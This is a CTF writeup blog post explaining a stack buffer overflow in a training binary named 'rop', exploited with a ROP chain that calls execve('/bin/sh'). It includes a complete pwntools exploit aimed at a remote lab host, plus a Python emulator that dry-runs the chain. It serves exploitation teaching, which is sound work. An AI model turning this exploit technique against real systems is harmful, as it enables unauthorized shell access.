Yuawn Pwn2 rop Writeup

kazma, founder and president of the NCKU Cyber Security Club (成大資安社)

rop

The source is provided, but let's pretend it isn't XD.
Take a look at main with r2:

[image: r2 disassembly of main]

There is a 0x30-byte buffer on the stack that is filled with gets, so the overflow is unbounded and we can overwrite the return address. The binary is not PIE and carries its own syscall gadget, so we ROP straight to execve("/bin/sh", NULL, NULL) and get a shell.
Collect the gadgets we need with:

ROPgadget --binary ./rop --only "pop|ret" | less
ROPgadget --binary ./rop --only "mov|ret" | less

Use gdb's vmmap to find a writable address where we can store "/bin/sh\0", then x/30gx that region to make sure the 8-byte write won't clobber anything the program still uses:

[image: vmmap output]

exploit.py:

from pwn import *

context.arch = 'amd64'

r = remote('10.129.0.57', 10173)

# Gadgets found with ROPgadget; the binary is not PIE, so the addresses are fixed
pop_rax = 0x0000000000415714          # pop rax ; ret
pop_rdi = 0x0000000000400686          # pop rdi ; ret
pop_rdx_rsi = 0x000000000044beb9      # pop rdx ; pop rsi ; ret
syscall = 0x000000000040125c          # syscall
bss = 0x00000000006b6000              # writable and unused: will hold "/bin/sh\0"
mov_q_rdi_rdx = 0x00000000004356b3    # mov qword ptr [rdi], rdx ; ret
pop_rdx = 0x000000000044be96          # pop rdx ; ret

p = b'a'*0x38                                            # 0x30 buffer + 8 bytes saved rbp -> return address
p += p64(pop_rdi) + p64(bss)                             # rdi = bss
p += p64(pop_rdx) + b'/bin/sh\0' + p64(mov_q_rdi_rdx)    # rdx = "/bin/sh\0"; [bss] = rdx
p += p64(pop_rdx_rsi) + p64(0x0) + p64(0x0)              # rdx = NULL (envp), rsi = NULL (argv)
p += p64(pop_rax) + p64(0x3b)                            # rax = SYS_execve
p += p64(syscall)                                        # execve("/bin/sh", NULL, NULL)

r.sendlineafter(b':D', p)
r.interactive()
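Before firing a chain like this at a remote target it is worth dry-running it. The block below is an added example (my own code, not part of the original writeup or the challenge): it rebuilds the same payload with plain struct instead of pwntools and walks it through a tiny emulator that knows only the six gadgets above, so you can see the register state and the memory write at the moment syscall is reached. The gadget addresses are the ones from exploit.py; the micro-op semantics in GADGETS are assumed from the gadget names and should be confirmed against the real disassembly.

```python
import struct

# Gadget addresses as listed in exploit.py (non-PIE binary, fixed addresses).
# The semantics recorded in GADGETS below are ASSUMED from the gadget names;
# verify them against the disassembly before trusting this dry run.
POP_RAX = 0x415714            # pop rax ; ret
POP_RDI = 0x400686            # pop rdi ; ret
POP_RDX_RSI = 0x44beb9        # pop rdx ; pop rsi ; ret
POP_RDX = 0x44be96            # pop rdx ; ret
MOV_QWORD_RDI_RDX = 0x4356b3  # mov qword ptr [rdi], rdx ; ret
SYSCALL = 0x40125c            # syscall
BSS = 0x6b6000                # writable, otherwise unused (checked with vmmap / x/30gx)
SYS_EXECVE = 0x3b

BUF_SIZE = 0x30               # char buf[0x30] filled by gets()
PADDING = BUF_SIZE + 8        # + saved rbp = 0x38 bytes before the return address


def p64(v):
    return struct.pack('<Q', v)


def u64(b):
    return struct.unpack('<Q', b)[0]


def build_chain(binsh_addr=BSS):
    """Same payload as exploit.py: padding, then a chain for execve("/bin/sh", 0, 0)."""
    chain = b'a' * PADDING
    chain += p64(POP_RDI) + p64(binsh_addr)                        # rdi = where to store the string
    chain += p64(POP_RDX) + b'/bin/sh\0' + p64(MOV_QWORD_RDI_RDX)  # rdx = "/bin/sh\0"; [rdi] = rdx
    chain += p64(POP_RDX_RSI) + p64(0) + p64(0)                    # rdx = NULL envp, rsi = NULL argv
    chain += p64(POP_RAX) + p64(SYS_EXECVE)                        # rax = 59
    chain += p64(SYSCALL)
    return chain


# Each gadget is a list of micro-ops followed by an implicit 'ret'.
GADGETS = {
    POP_RAX: ['pop rax'],
    POP_RDI: ['pop rdi'],
    POP_RDX: ['pop rdx'],
    POP_RDX_RSI: ['pop rdx', 'pop rsi'],
    MOV_QWORD_RDI_RDX: ['mov [rdi], rdx'],
    SYSCALL: ['syscall'],
}


def emulate(chain, padding=PADDING):
    """Walk the chain the way ret/pop would and stop at the first syscall.

    Returns (regs, mem): the register values and the 8-byte stores the chain made.
    """
    stack = chain[padding:]  # bytes from the overwritten return address upwards
    regs = {'rax': 0, 'rdi': 0, 'rsi': 0, 'rdx': 0}
    mem = {}
    rsp = 0

    def pop():
        nonlocal rsp
        if rsp + 8 > len(stack):
            raise ValueError('chain ran off the end of the stack')
        value = u64(stack[rsp:rsp + 8])
        rsp += 8
        return value

    while rsp < len(stack):
        rip = pop()  # 'ret' pops the next gadget address
        if rip not in GADGETS:
            raise ValueError(f'chain returns into unknown address {rip:#x}')
        for op in GADGETS[rip]:
            if op.startswith('pop '):
                regs[op[4:]] = pop()
            elif op == 'mov [rdi], rdx':
                mem[regs['rdi']] = p64(regs['rdx'])
            elif op == 'syscall':
                return regs, mem
    raise ValueError('chain ended without reaching syscall')


def is_execve_binsh(chain):
    """True if the chain reaches syscall with the registers execve("/bin/sh", NULL, NULL) needs."""
    regs, mem = emulate(chain)
    path = mem.get(regs['rdi'], b'').split(b'\0', 1)[0]
    return (regs['rax'] == SYS_EXECVE and path == b'/bin/sh'
            and regs['rsi'] == 0 and regs['rdx'] == 0)


if __name__ == '__main__':
    chain = build_chain()
    print(f'payload: {len(chain)} bytes, execve ok: {is_execve_binsh(chain)}')
```

The emulator is deliberately dumb: anything that is not one of the six known gadgets is an error, which is exactly what you want when a typo in an address would otherwise only show up as a remote crash. The string store is checked through memory rather than by reading rdx, because a chain that sets rdx to "/bin/sh" but never writes it (or writes it somewhere other than rdi) would still look fine on the registers alone.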

Result:

[image: shell obtained on the remote target]

Pwned !!!

  • Title: Yuawn Pwn2 rop Writeup
  • Author: kazma
  • Created at : 2023-12-12 18:47:00
  • Updated at : 2023-12-14 01:06:10
  • Link: https://kazma.tw/2023/12/12/Yuawn-Pwn2-rop-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.